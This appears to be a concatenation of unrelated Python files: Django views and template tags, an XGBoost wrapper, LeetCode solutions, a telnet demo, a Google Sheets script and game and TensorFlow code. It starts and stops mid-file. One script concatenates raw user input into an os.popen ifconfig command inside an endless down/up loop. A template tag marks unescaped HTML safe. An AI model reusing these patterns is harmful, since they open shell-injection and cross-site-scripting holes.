    y += 2
|
nilq/baby-python
|
python
|
from datetime import datetime
from django.utils import timezone
from django.shortcuts import render, get_object_or_404
from django.db.models import Q
from django.contrib.auth.models import User, Group
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.http import HttpResponseBadRequest, HttpResponseRedirect
from django.views.decorators.http import condition
from foundation_public.models.organization import PublicOrganization
from tenant_profile.decorators import tenant_profile_required
from tenant_intake.decorators import tenant_intake_required
from tenant_reception.decorators import tenant_reception_required
from tenant_configuration.decorators import tenant_configuration_required
from foundation_tenant.decorators import tenant_required
from foundation_tenant.models.base.message import Message
from foundation_tenant.models.base.me import Me
from smegurus import constants
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def inbox_page(request):
    """Render the inbox with one entry per conversation partner."""
    # Fetch all the Messages and only get a single message per sender. Also ensure
    # that deleted messages are not returned.
    # (distinct('participants') is field-based DISTINCT ON — PostgreSQL only.)
    messages = Message.objects.filter(
        recipient=request.tenant_me,
        participants=request.tenant_me
    ).distinct('participants')
    return render(request, 'tenant_message/message/master_view.html',{
        'page': 'inbox',
        'messages': messages,
    })
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def compose_page(request):
    """Render the generic message composer with every recipient group."""
    def _members_of(group_id):
        # Lazy queryset of Me profiles whose owner belongs to the auth group.
        return Me.objects.filter(owner__groups__id=group_id)

    return render(request, 'tenant_message/composer/generic_view.html', {
        'page': 'composer',
        'entrepreneurs': _members_of(constants.ENTREPRENEUR_GROUP_ID),
        'mentors': _members_of(constants.MENTOR_GROUP_ID),
        'advisors': _members_of(constants.ADVISOR_GROUP_ID),
        'managers': _members_of(constants.ORGANIZATION_MANAGER_GROUP_ID),
        'admins': _members_of(constants.ORGANIZATION_ADMIN_GROUP_ID),
        'recipient_id': 0,
    })
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def specific_compose_page(request, id):
    """Render the composer pre-addressed to the Me with primary key *id*."""
    def _members_of(group_id):
        # Lazy queryset of Me profiles whose owner belongs to the auth group.
        return Me.objects.filter(owner__groups__id=group_id)

    return render(request, 'tenant_message/composer/specific_view.html', {
        'page': 'composer',
        'entrepreneurs': _members_of(constants.ENTREPRENEUR_GROUP_ID),
        'mentors': _members_of(constants.MENTOR_GROUP_ID),
        'advisors': _members_of(constants.ADVISOR_GROUP_ID),
        'managers': _members_of(constants.ORGANIZATION_MANAGER_GROUP_ID),
        'admins': _members_of(constants.ORGANIZATION_ADMIN_GROUP_ID),
        'recipient': get_object_or_404(Me, pk=id),
    })
@login_required()
@tenant_required
def latest_conversation_details(request, sender_id):
    """Return the last-modified timestamp of the newest message exchanged
    between the viewer and *sender_id* (for HTTP conditional views).

    Raises Message.DoesNotExist when no such message exists.
    """
    # NOTE(review): the second Q passes a Me instance to the *_id lookup
    # (sender_id=request.tenant_me) while the first uses int(sender_id);
    # this looks like it was meant to be sender=request.tenant_me — confirm.
    return Message.objects.filter(
        Q(
            recipient=request.tenant_me,
            sender_id=int(sender_id),
            participants=request.tenant_me
        ) | Q(
            recipient_id=int(sender_id),
            sender_id=request.tenant_me,
            participants=request.tenant_me
        )
    ).latest("last_modified").last_modified
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def conversation_page(request, sender_id):
    """Render the two-way conversation with *sender_id*, oldest first, and
    stamp the viewer's received messages as read."""
    # NOTE(review): sender_id=request.tenant_me in the second Q passes a Me
    # instance to an *_id lookup (mirror clause uses int()) — confirm intent.
    messages = Message.objects.filter(
        Q(
            recipient=request.tenant_me,
            sender_id=int(sender_id),
            participants=request.tenant_me
        ) | Q(
            recipient_id=int(sender_id),
            sender_id=request.tenant_me,
            participants=request.tenant_me
        )
    ).order_by("created")
    # Recipients have the ability to update the 'date_read'.
    for message in messages.all():
        if message.recipient == request.tenant_me:
            # Give the message the read-time.
            message.date_read = timezone.now()
            message.save()
    return render(request, 'tenant_message/message/details_view.html',{
        'page': 'inbox',
        'messages': messages,
        'sender_id': sender_id,
    })
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def archive_conversation_page(request, sender_id):
    """Archive the conversation with *sender_id* by removing the viewer from
    every message's participants, then redirect back to the inbox."""
    messages = Message.objects.filter(
        Q(
            recipient=request.tenant_me,
            sender_id=int(sender_id),
            participants=request.tenant_me
        ) | Q(
            recipient_id=int(sender_id),
            sender_id=request.tenant_me,
            participants=request.tenant_me
        )
    ).order_by("created")
    # Iterate through all the messages and removes the person from the conversation. (A.k.a.: archived)
    for message in messages.all():
        message.participants.remove(request.tenant_me)
        message.save()
    # Redirect his page.
    return HttpResponseRedirect(reverse('tenant_message_inbox'))
@login_required()
@tenant_required
def latest_archived_message_master(request):
    """Last-modified timestamp of the newest archived message (received but
    viewer no longer a participant); falls back to "now" when none exist."""
    try:
        return Message.objects.filter(
            Q(
                recipient=request.tenant_me
            ) &~ # and not
            Q(
                participants=request.tenant_me
            )
        ).latest("last_modified").last_modified
    except Message.DoesNotExist:
        # NOTE(review): naive datetime.now() while the rest of this module
        # uses timezone-aware times — confirm against USE_TZ settings.
        return datetime.now()
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
# @condition(last_modified_func=latest_archived_message_master)
def archive_list_page(request):
    """Render archived conversations: messages the viewer received but has
    removed themselves from (no longer a participant)."""
    # Fetch all the Messages and only get a single message per sender. Also ensure
    # that deleted messages are not returned.
    # (distinct('participants') is field-based DISTINCT ON — PostgreSQL only.)
    messages = Message.objects.filter(
        Q(
            recipient=request.tenant_me
        ) &~ # and not
        Q(
            participants=request.tenant_me
        )
    ).distinct('participants')
    return render(request, 'tenant_message/archive/master_view.html',{
        'page': 'archive',
        'messages': messages,
    })
@login_required(login_url='/en/login')
@tenant_required
@tenant_intake_required
@tenant_reception_required
@tenant_profile_required
@tenant_configuration_required
def archive_details_page(request, sender_id):
    """Render the archived conversation with *sender_id*, oldest first."""
    # Each side of the | keeps messages between the two parties where the
    # viewer is NOT a participant (i.e. archived).
    # NOTE(review): sender_id=request.tenant_me passes a Me instance to an
    # *_id lookup (the mirror clause uses int(sender_id)) — confirm this was
    # not meant to be sender=request.tenant_me.
    messages = Message.objects.filter(
        Q(
            Q(
                recipient=request.tenant_me,
                sender_id=int(sender_id),
            ) &~ # and not
            Q(
                participants=request.tenant_me
            )
        ) |
        Q(
            Q(
                recipient_id=int(sender_id),
                sender_id=request.tenant_me,
            ) &~ # and not
            Q(
                participants=request.tenant_me
            )
        )
    ).order_by("created")
    return render(request, 'tenant_message/archive/details_view.html',{
        'page': 'archive',
        'messages': messages,
        'sender_id': sender_id,
    })
|
nilq/baby-python
|
python
|
# https://leetcode.com/problems/palindrome-number/
class Solution:
    def isPalindrome(self, x: int) -> bool:
        """Return True if the decimal digits of x read the same reversed.

        Negative numbers are never palindromes.
        """
        if x < 0:
            return False
        remaining, reversed_digits = x, 0
        while remaining:
            reversed_digits = reversed_digits * 10 + remaining % 10
            # Floor division stays exact for arbitrarily large ints; the
            # previous int(remaining / 10) went through a float and silently
            # corrupted digits beyond ~2**53.
            remaining //= 10
        return reversed_digits == x
|
nilq/baby-python
|
python
|
import numpy as np
import multiprocessing
import xgboost as xgb # requires xgboost package, installed e.g. via 'pip install xgboost'
class XGBoost:
    """Thin wrapper around xgboost's learning API with an interface
    (train/test/eval/predict) mirroring the project's neural trainers."""

    def __init__(self, train_loader, val_loader, x_shape, dim_out, args):
        """Materialise both loaders into numpy arrays, pick objective and
        eval metric from args, and assemble the xgboost parameter dict.

        Args:
            train_loader / val_loader: loaders exposing numpy_data().
            x_shape: input shape (unused here).
            dim_out: number of regression targets / classes.
            args: run configuration (regression, criterion, lr/decay,
                n_workers, verbose, xgboost hyper-parameters, ...).
        """
        self.args = args
        self.dim_out = dim_out
        # --- objective / eval-metric selection -------------------------
        if args.regression:
            # NOTE(review): 'reg:linear' is deprecated in newer XGBoost in
            # favour of 'reg:squarederror' — confirm the targeted version.
            objective = 'reg:linear'
            eval_metric = 'rmse'
            if args.criterion in {'mae', 'l1'}:
                eval_metric = 'mae'
            elif args.criterion not in {None, 'auto', 'rmse'}:
                raise Exception('Unknown eval_metric={}. For regression, use auto (rmse) | mae (l1).'.format(
                    args.criterion))
        else:
            if self.dim_out > 2:
                objective = 'multi:softmax' # out 1 vector of classes
                if args.criterion in {None, 'auto', 'error', 'merror'}:
                    eval_metric = 'merror'
                elif args.criterion in {'logloss', 'nll'}:
                    eval_metric = 'mlogloss'
                else:
                    raise Exception('eval_metric={} is not supported for multi-classes classification. '
                                    'Use auto (merror) | logloss (nll)'.format(args.criterion))
            else:
                objective = 'binary:hinge' # 'binary:logistic' # logistic -> predict outputs probability, not class
                if args.criterion in {None, 'auto', 'error', 'merror'}:
                    eval_metric = 'error'
                elif args.criterion in {'logloss', 'nll'}: # auc somehow only works with 2 classes
                    eval_metric = 'logloss'
                elif args.criterion == 'auc': # auc somehow only works with 2 classes
                    eval_metric = 'auc'
                else:
                    raise Exception('eval_metric={} is not supported for 2-class classification. '
                                    'Use auto (error) | logloss (nll) | auc'.format(args.criterion))
        # --- data: flatten anything beyond 2-D into (N, features) ------
        self.x_train, self.y_train = train_loader.numpy_data()
        self.x_val, self.y_val = val_loader.numpy_data()
        if len(self.x_train.shape) > 2:
            self.x_train = self.x_train.reshape(self.x_train.shape[0], -1)
            self.x_val = self.x_val.reshape(self.x_val.shape[0], -1)
        self.dtrain = xgb.DMatrix(self.x_train, label=self.y_train)
        self.dval = xgb.DMatrix(self.x_val, label=self.y_val)
        # early_stopping <= 0 means "disabled".
        if args.early_stopping is not None and args.early_stopping <= 0:
            self.early_stopping = None
        else:
            self.early_stopping = args.early_stopping
        # --- worker-count normalisation --------------------------------
        # Negative values are shorthands: <=-300 -> ncpu/3, <=-200 -> ncpu/2,
        # other negatives -> ncpu + n_workers; clamped to [1, num_cpu].
        num_cpu = multiprocessing.cpu_count()
        if not hasattr(args, 'n_workers') or args.n_workers is None:
            args.n_workers = 1
        elif args.n_workers > num_cpu:
            args.n_workers = num_cpu
            if args.verbose >= 3:
                print('args.n_workers is inefficiently large, changed it to num_cpu=' + str(num_cpu))
        elif args.n_workers <= -300:
            args.n_workers = max(1, num_cpu // 3)
        elif args.n_workers <= -200:
            args.n_workers = max(1, num_cpu // 2)
        elif args.n_workers < 0:
            args.n_workers = max(1, num_cpu + args.n_workers)
        self.params = {'objective': objective,
                       'eval_metric': eval_metric,
                       'seed': args.seed,
                       'max_depth': args.max_depth,
                       'eta': args.eta,
                       'min_child_weight': args.min_child_weight,
                       'gamma': args.gamma,
                       'subsample': args.subsample,
                       'colsample_bytree': args.colsample_bytree,
                       'lambda': args.reg_lambda,
                       'alpha': args.reg_alpha,
                       'scale_pos_weight': args.scale_pos_weight,
                       'nthread': args.n_workers}
        if objective == 'multi:softmax' or objective == 'multi:softprob':
            self.params['num_class'] = dim_out
        self.result = {'n_estimators': 0}
        self.model = None
        if args.verbose >= 3:
            print('XGBOOST OPTIMIZER LOADED: ')

    def eval(self, x, y):
        """Predict on (x, y) and return (loss, error, rmse, mae).

        Regression fills rmse/mae (error stays inf); classification fills
        error (rmse/mae stay inf).
        """
        pred = self.predict(x)
        rmse = mae = error = float('inf')
        if self.args.regression:
            rmse = np.sqrt(np.sum((pred - y)**2) / y.shape[0]).item()
            mae = (np.sum(np.abs(pred - y)) / y.shape[0]).item()
        else:
            if self.params['objective'] == 'binary:logistic': # pred is probability, not class
                pred[pred >= 0.5] = 1
                pred[pred < 0.5] = 0
                pred = pred.astype(int)
            correct = np.sum(pred == y).item()
            error = 1.0 - float(correct) / y.shape[0]
        # NOTE(review): loss is always rmse-or-mae, even for classification
        # (where both are inf) — confirm callers only use 'error' there.
        loss = rmse if self.params['eval_metric'] == 'rmse' else mae
        return loss, error, rmse, mae

    def train(self):
        """Fit the booster (with optional early stopping on the validation
        set), evaluate on train/val, and store the summary in self.result."""
        eval_list = [(self.dtrain, 'train'), (self.dval, 'valdt')] # last in the list is used for early stopping
        if self.args.verbose >= 5:
            verbose_eval = True
        elif self.args.verbose <= 3:
            verbose_eval = False
        else:
            verbose_eval = self.args.n_estimators // 10 # output only 10 evaluation info
        self.model = xgb.train(self.params, self.dtrain, self.args.n_estimators, eval_list,
                               verbose_eval=verbose_eval, early_stopping_rounds=self.early_stopping)
        tr_loss, tr_error, tr_rmse, tr_mae = self.eval(self.x_train, self.y_train)
        vl_loss, vl_error, vl_rmse, vl_mae = self.eval(self.x_val, self.y_val)
        # NOTE(review): best_ntree_limit was removed in XGBoost 2.x — confirm
        # the pinned xgboost version.
        self.result = {'train_loss': tr_loss, 'train_error': tr_error, 'train_rmse': tr_rmse, 'train_mae': tr_mae,
                       'val_loss': vl_loss, 'val_error': vl_error, 'val_rmse': vl_rmse, 'val_mae': vl_mae,
                       'n_estimators': self.model.best_ntree_limit}
        if self.args.verbose >= 3:
            if self.args.regression and not self.args.dataset.endswith("_r"):
                print('TRAIN RESULT: Loss: {:.5f} RMSE: {:.5f} MAE: {:.5f}'.format(tr_loss, tr_rmse, tr_mae))
                print('VALDT RESULT: Loss: {:.5f} RMSE: {:.5f} MAE: {:.5f}'.format(vl_loss, vl_rmse, vl_mae))
            else:
                print('TRAIN RESULT: Loss: {:.5f} Error: {:.2f}% Accuracy: {:.2f}%'.format(
                    tr_loss, 100. * tr_error, 100. * (1 - tr_error)))
                print('VALDT RESULT: Loss: {:.5f} Error: {:.2f}% Accuracy: {:.2f}%'.format(
                    vl_loss, 100. * vl_error, 100. * (1 - vl_error)))

    def test(self, dataloader):
        """Evaluate the trained booster on *dataloader* (flattened like the
        training data); returns the eval() tuple."""
        x_test, y_test = dataloader.numpy_data()
        if len(x_test.shape) > 2:
            x_test = x_test.reshape(x_test.shape[0], -1)
        return self.eval(x_test, y_test)

    def predict(self, x):
        """Predict on raw numpy *x* using the best iteration found."""
        assert self.model, 'model is not yet trained. Call train() first!'
        x = xgb.DMatrix(x)
        pred = self.model.predict(x, ntree_limit=self.model.best_ntree_limit)
        return pred

    @property
    def best_n_modules(self):
        # Number of trees at the best (early-stopped) iteration.
        return self.result['n_estimators']
|
nilq/baby-python
|
python
|
import os
import time
# Ask which network interface should be toggled in an endless loop.
eth_name = input('请输入要循环启用关闭的网卡名称:')
cycle = 1
while True:
    # Bring the interface down, wait, bring it back up, wait.
    os.popen('ifconfig ' + eth_name + ' down')
    print(eth_name + '网卡关闭了')
    time.sleep(5)
    os.popen('ifconfig ' + eth_name + ' up')
    print(eth_name + '网卡开启了')
    time.sleep(5)
    print('第' + str(cycle) + '次循环结束')
    cycle += 1
|
nilq/baby-python
|
python
|
import wx
class Example(wx.Frame):
    """Fixed-size top-level frame placed at a fixed screen position."""

    def __init__(self, parent, title):
        super(Example, self).__init__(parent, title=title,
            size=(400, 200))
        # Place the window at (800, 250) instead of centring it.
        self.Move((800, 250))
        #self.Centre()
def main():
    """Create the wx application, show the demo frame, enter the loop."""
    app = wx.App()
    frame = Example(None, title='M2I & MQL - Moving Wind')
    frame.Show()
    app.MainLoop()


if __name__ == '__main__':
    main()
|
nilq/baby-python
|
python
|
"""
This file defines common tags to use in templates
"""
from django import template
from django.contrib import messages
from django.template.defaultfilters import safe
register = template.Library()
@register.filter(name="make_spaces")
def make_spaces(in_string: str) -> str:
"""
This filter takes a string and replaces all dashes and underscores with spaces
:param in_string: The string to change
:type in_string: str
:returns: A string with no dashes or underscores
:rtype: str
"""
return in_string.replace("_", " ").replace("-", " ")
# Destructive actions all map to the "danger" link class.
link_types = dict.fromkeys(('delete', 'abandon', 'cancel'), 'link-danger')


@register.filter(name="link_class")
def get_link_class(action_name: str) -> str:
    """
    This filter gets what link class to use based off the action that it performs

    :param action_name: The name of the action
    :type action_name: str
    :returns: The link class that conveys what the action does
    :rtype: str
    """
    return link_types.get(action_name, "link-primary")
# Django message level -> bootstrap alert suffix.
level_classes = {
    messages.DEBUG: "info",
    messages.INFO: "info",
    messages.SUCCESS: "success",
    messages.WARNING: "warning",
    messages.ERROR: "danger",
}


@register.filter(name="alert_class")
def get_alert_class(message_level: str) -> str:
    """
    This filter gets an alert class for the specified message type

    :param message_level: The level of the message
    :type message_level: int
    :returns: The corresponding alert class to use
    :rtype: str
    """
    suffix = level_classes.get(message_level, "info")
    return f'alert-{suffix}'
# Django message level -> bootstrap icon name.
icon_classes = {
    messages.DEBUG: "info-circle",
    messages.INFO: "info-circle",
    messages.SUCCESS: "check-circle",
    messages.WARNING: "exclamation-triangle",
    messages.ERROR: "exclamation-circle",
}


@register.filter(name="icon_class")
def get_icon_class(message_level: str) -> str:
    """
    This filter gets an alert icon for the specified message type

    :param message_level: The level of the message
    :type message_level: int
    :returns: The corresponding alert icon to use
    :rtype: str
    """
    icon = icon_classes.get(message_level, "info-circle")
    return f'bi bi-{icon}'
@register.simple_tag(name="external_link")
def external_link(href: str, display_text: str, classes: str = "") -> str:
"""
This tag will render an <a> element that will open in a new tab and be marked as external
:param href: The href of the link
:type href: str
:param display_text: The test to display in the <a> element
:type display_text: str
:param classes: Classes to add to the <a> element
:type classes: str
:returns: An <a> element in html that when clicked will open in a new tab
:rtype: str
"""
return safe(f'<a href="{href}" class="{classes}" target="_blank" rel="noopener">{display_text}</a>')
|
nilq/baby-python
|
python
|
import json
from google.protobuf import json_format
from services.doubler.doubler_pb2 import Number
def build_request_from_dict(d, request):
    """Populate protobuf message *request* from dict *d* via its JSON form."""
    return json_format.Parse(json.dumps(d), request)
def build_request_from_file(filename, request):
    """Populate protobuf message *request* from the JSON file *filename*."""
    with open(filename) as fp:
        return json_format.Parse(fp.read(), request)
def build_number_from_dict(d):
    """Convenience wrapper: parse dict *d* into a fresh Number message."""
    return build_request_from_dict(d, Number())
def build_number_from_file(filename):
    """Convenience wrapper: parse JSON file *filename* into a Number message."""
    return build_request_from_file(filename, Number())
|
nilq/baby-python
|
python
|
from .convLSTM import StConvLSTM
from .GRU import StGRU
from .additive import StAdditive
from .LSTM import StLSTM
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
"""
Example of a telnet application that displays a dialog window.
"""
from __future__ import unicode_literals
from prompt_toolkit.contrib.telnet.server import TelnetServer
from prompt_toolkit.shortcuts.dialogs import yes_no_dialog
from prompt_toolkit.eventloop import From, get_event_loop
import logging
# Set up logging
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
def interact(connection):
    # Per-connection coroutine: show a yes/no dialog (generator-style async
    # via the eventloop From/yield API) and echo the user's choice back.
    result = yield From(yes_no_dialog(
        title='Yes/no dialog demo', text='Press yes or no', async_=True))
    connection.send('You said: {}\n'.format(result))
    connection.send('Bye.\n')
def main():
    """Serve the dialog demo over telnet on port 2323, forever."""
    telnet_server = TelnetServer(interact=interact, port=2323)
    telnet_server.start()
    get_event_loop().run_forever()


if __name__ == '__main__':
    main()
|
nilq/baby-python
|
python
|
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
def contruindo_relatorio(service, creds, SAMPLE_SPREADSHEET_ID, lista):
    """Write the closed-orders report into the spreadsheet.

    Writes the number of closed orders to cell D2 and one order description
    per row in column A, starting at row 2.

    Args:
        service: an authorized Sheets API service object.
        creds: OAuth credentials (kept for interface compatibility; the
            already-built *service* is now used directly instead of
            rebuilding a service per write).
        SAMPLE_SPREADSHEET_ID: id of the target spreadsheet.
        lista: list of closed-order descriptions.
    """
    # Reuse the passed-in service; the original rebuilt it on every write.
    sheet = service.spreadsheets()

    # Number of closed orders -> D2.
    sheet.values().update(
        spreadsheetId=SAMPLE_SPREADSHEET_ID,
        range="Página1!D2",
        valueInputOption="USER_ENTERED",
        body={'values': [[len(lista)]]},
    ).execute()

    # One order description per row in column A, starting at row 2.
    for row, texto in enumerate(lista, start=2):
        sheet.values().update(
            spreadsheetId=SAMPLE_SPREADSHEET_ID,
            range="Página1!A%i" % row,
            valueInputOption="USER_ENTERED",
            body={'values': [[texto]]},
        ).execute()
def main(lista):
    """Authorize against the Sheets API (cached token.pickle, interactive
    OAuth flow on first run) and write the report for *lista*."""
    # If modifying these scopes, delete the file token.pickle.
    SCOPES = ['https://www.googleapis.com/auth/spreadsheets']
    # The ID and range of a sample spreadsheet.
    padrao_planilha= input("deseja usar a mesma planilha. y ou digite qualquer coisa\n").lower()
    if padrao_planilha == "y":
        SAMPLE_SPREADSHEET_ID = '1RDZli3pQ3wFVgjJ2NnB5OE47VMsvhkDkLnyeEZs-563'
    else:
        SAMPLE_SPREADSHEET_ID = input("INSERIR A PARTE DO URL DO GOOGLE SHEETS, EX: 1RDZli3pQ3wFVgjJ2NnB5OE47VMsvhkDkLnyeEZs-563 \n")
    """Shows basic usage of the Sheets API.
    Prints values from a sample spreadsheet.
    """
    lista= lista  # no-op self-assignment, kept as-is
    creds = None
    # The file token.pickle stores the user's access and refresh tokens, and is
    # created automatically when the authorization flow completes for the first
    # time.
    if os.path.exists('token.pickle'):
        with open('token.pickle', 'rb') as token:
            creds = pickle.load(token)
    # If there are no (valid) credentials available, let the user log in.
    if not creds or not creds.valid:
        if creds and creds.expired and creds.refresh_token:
            creds.refresh(Request())
        else:
            flow = InstalledAppFlow.from_client_secrets_file(
                'credentials.json', SCOPES)
            creds = flow.run_local_server(port=0)
        # Save the credentials for the next run
        with open('token.pickle', 'wb') as token:
            pickle.dump(creds, token)
    service = build('sheets', 'v4', credentials=creds)
    contruindo_relatorio(service, creds, SAMPLE_SPREADSHEET_ID, lista)
|
nilq/baby-python
|
python
|
'''
Created on Jan 6, 2016
@author: T0157129
'''
import logging
import logging.config
from Items.PotionObject import PotionObject
class MyCharacter:
    '''
    This class represents a basic character.
    Attributes:
        int HP : represents the Health Points of the character.
            If HP==0 the character is dead
        dict equipment : represents the equipment of the character.
            weapon : the character's active weaponObject
            armor : the character's active armorObject
        dict bag : represents the bag of the character. Here will be stored every found item.
            HP_potion : the number of HP potions that the character owns.
            <item_name> : any found itemObject.
    Functions:
        boolean isAlive()
    '''
    def __init__(self, HP, name, level):
        '''
        Constructor
        '''
        # HPinit remembers the maximum so fillHP() can cap recovery.
        self.HPinit= HP
        self.HP = HP
        self.name = name
        self.level= level
        self.gold= 0
        self.equipment= {}
        self.equipment["weapon"]=None
        self.equipment["armor"]=None
        self.bag={}
    '''
    boolean isAlive()
    Return true if HP > 0
    '''
    def isAlive(self):
        return self.HP>0
    ########################################
    # EQUIPMENT management
    ########################################
    '''
    void equipWeapon(weaponObject)
    Equip the character with the weaponObject.
    If a weapon is already equipped, the old one is added to the bag.
    '''
    def equipWeapon(self, weaponObject):
        if weaponObject is not None:
            actualWeapon= self.equipment["weapon"]
            if actualWeapon is not None:
                self.addToBag(actualWeapon)
            self.equipment["weapon"]= weaponObject
            # self.logger.info("Weapon equipped: %s" % weaponObject.name)
    '''
    void equipArmor(armorObject)
    Equip the character with the armorObject.
    If an armor is already equipped, the old one is added to the bag.
    '''
    def equipArmor(self, armorObject):
        if armorObject is not None:
            # getArmor() also clears the armor slot as a side effect.
            actualArmor = self.getArmor()
            if actualArmor is not None:
                self.addToBag(actualArmor)
            self.equipment["armor"]= armorObject
            # self.logger.info("Armor equipped: %s" % armorObject.name)
    '''
    weaponObject getWeapon()
    Return the equipped weapon.
    Can be None
    '''
    def getWeapon(self):
        # NOTE: despite the "get" name this empties the weapon slot.
        weapon = self.equipment["weapon"]
        self.equipment["weapon"]= None
        return weapon
    '''
    armorObject getArmor()
    Return the equipped armor.
    Can be None
    '''
    def getArmor(self):
        # NOTE: despite the "get" name this empties the armor slot.
        armor = self.equipment["armor"]
        self.equipment["armor"]= None
        return armor
    ########################################
    # BAG management
    ########################################
    '''
    void listInventory()
    Print the content of the character's bag
    '''
    def listInventory(self):
        print( '-- INVENTORY OF %s CONTAINS:' % self.name)
        for itemName in self.bag.keys():
            print (" |%s" % self.bag[itemName])
    '''
    void addToBag(itemObject)
    Add itemObject to the bag.
    The key for this object is the itemObject.name
    '''
    def addToBag(self, itemObject):
        # NOTE(review): items expose name as a *callable* (itemObject.name())
        # while MyCharacter.name is a plain attribute — confirm item API.
        self.bag[itemObject.name()]= itemObject
        print("Item put in bag: %s" % itemObject.name())
    '''
    itemObject getFromBag(itemName)
    Get the object named "itemName" from the bag.
    If there is no itemObject named like this in the bag, return None.
    '''
    def getFromBag(self, itemName):
        # NOTE(review): [] raises KeyError for a missing name; the docstring
        # above promises None — confirm intended behaviour.
        return self.bag[itemName]
    '''
    itemObject takeFromBag(itemName)
    Get the object named "itemName" from the bag.
    The object is no longer in the bag.
    If there is no itemObject named like this in the bag, return None.
    '''
    def takeFromBag(self, itemName):
        return self.bag.pop(itemName)
    def removeFromBag(self, itemName):
        # Drop the item without returning it.
        self.bag.pop(itemName)
    '''
    void useFromBag(itemName)
    If an item with this name is found, call its use function.
    '''
    def useFromBag(self, itemName):
        item= self.bag.get(itemName)
        if item is not None:
            # NOTE(review): item.get('usable') is dict-style access on an
            # item object — confirm items really implement .get(); otherwise
            # this raises AttributeError for non-dict items.
            if item.get('usable') is None:
                print('Not usable')
                return
            else:
                #If it's not a potion we remove the object from the bag
                if not isinstance(item, PotionObject):
                    item= self.takeFromBag(itemName)
                if item is None:
                    print("No such object in the bag.")
                else:
                    item.use(self)
        else:
            print("none obj")
    ########################################
    # FIGHT management
    ########################################
    '''
    void defend(damagePoints)
    The character loose HP depending on his armor and damagePoints.
    '''
    def defend(self, damagePoints):
        armor= self.equipment["armor"]
        if armor != None:
            # Armor absorbs damage, floored at zero.
            m_damagePoints = damagePoints - armor.defensePoints()
            if m_damagePoints < 0:
                m_damagePoints=0
        else:
            m_damagePoints = damagePoints
        self.HP = self.HP - m_damagePoints
        print("%s has lost %d HP..." % (self.name,m_damagePoints))
    '''
    void attack(characterObject)
    The character attacks characterObject.
    If the character has no weapon, do nothing.
    '''
    def attack(self, characterObject):
        weapon = self.equipment["weapon"]
        if weapon != None:
            print("%s attacks." % self.name)
            characterObject.defend(weapon.attackPoints())
        else:
            print("%s can't attack, no weapon..." % self.name)
    ########################################
    # Other functions
    ########################################
    '''
    unitsUsed fillHP(units)
    Refill HP bar with units points.
    Return the number of units recovered.
    (Can be: 0 if HP == HPinit
        or units
        or the difference between HP and HPinit if HP+units > HPinit)
    '''
    def fillHP(self, units):
        unitsUsed= 0
        if self.HP < self.HPinit:
            #Restore HP
            if self.HP + units >= self.HPinit:
                unitsUsed= self.HPinit - self.HP
            else:
                unitsUsed= units
            self.HP= self.HP + unitsUsed
            print("%s recovered %d HP." % (self.name, unitsUsed))
        else:
            print("%s HP already full." % self.name)
        return unitsUsed
|
nilq/baby-python
|
python
|
# Definition for an interval.
# class Interval(object):
# def __init__(self, s=0, e=0):
# self.start = s
# self.end = e
class Solution(object):
    def merge(self, intervals):
        """
        :type intervals: List[Interval]
        :rtype: List[Interval]
        """
        merged = []
        for current in sorted(intervals, key=lambda iv: iv.start):
            if merged and current.start <= merged[-1].end:
                # Overlap: extend the last merged interval in place.
                last = merged[-1]
                last.end = max(last.end, current.end)
            else:
                merged.append(current)
        return merged
|
nilq/baby-python
|
python
|
from __future__ import division
import os,time,cv2
import scipy.io as sio
import tensorflow as tf
import tensorflow.contrib.slim as slim
import numpy as np
from numpy import *
import scipy.linalg
from copy import copy, deepcopy
def lrelu(x):
    """Leaky ReLU with slope 0.2 on the negative side."""
    return tf.maximum(0.2 * x, x)
def identity_initializer():
    """Return an initializer producing identity-like conv kernels: a delta
    at the spatial centre connecting matching in/out channels."""
    def _initializer(shape, dtype=tf.float32, partition_info=None):
        # shape is (kh, kw, in_ch, out_ch); put a 1 at the kernel centre on
        # the channel diagonal so the layer starts as (near-)identity.
        array = np.zeros(shape, dtype=float)
        cx, cy = shape[0]//2, shape[1]//2
        for i in range(min(shape[2],shape[3])):
            array[cx, cy, i, i] = 1
        return tf.constant(array, dtype=dtype)
    return _initializer
def nm(x):
    """Learnable mix of the raw activation and its batch-normalised form."""
    # A fresh w0/w1 Variable pair is created on every call — each use site
    # gets its own mixing weights.
    w0=tf.Variable(1.0,name='w0')
    w1=tf.Variable(0.0,name='w1')
    return w0*x+w1*slim.batch_norm(x)
# Per-channel mean pixel values subtracted before VGG, shaped (1,1,1,3) for
# broadcasting over NHWC batches.  NOTE(review): confirm the channel order
# (RGB vs BGR) matches the pretrained weights being loaded.
MEAN_VALUES = np.array([123.6800, 116.7790, 103.9390]).reshape((1,1,1,3))
def build_net(ntype, nin, nwb=None, name=None):
    """Append one layer to the graph: a conv+bias+ReLU ('conv', using the
    (weights, bias) pair in *nwb*) or a 2x2 average pool ('pool')."""
    if ntype == 'conv':
        conv = tf.nn.conv2d(nin, nwb[0], strides=[1, 1, 1, 1], padding='SAME', name=name)
        return tf.nn.relu(conv + nwb[1])
    if ntype == 'pool':
        return tf.nn.avg_pool(nin, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def get_weight_bias(vgg_layers, i):
    """Extract layer *i*'s kernel and (flattened) bias from the MatConvNet
    VGG structure and wrap both as tf constants."""
    raw_weights = vgg_layers[i][0][0][2][0][0]
    raw_bias = vgg_layers[i][0][0][2][0][1]
    weights = tf.constant(raw_weights)
    bias = tf.constant(np.reshape(raw_bias, (raw_bias.size)))
    return weights, bias
def build_vgg19(input,reuse=False):
    """Build a truncated VGG19 feature extractor from pretrained .mat weights.

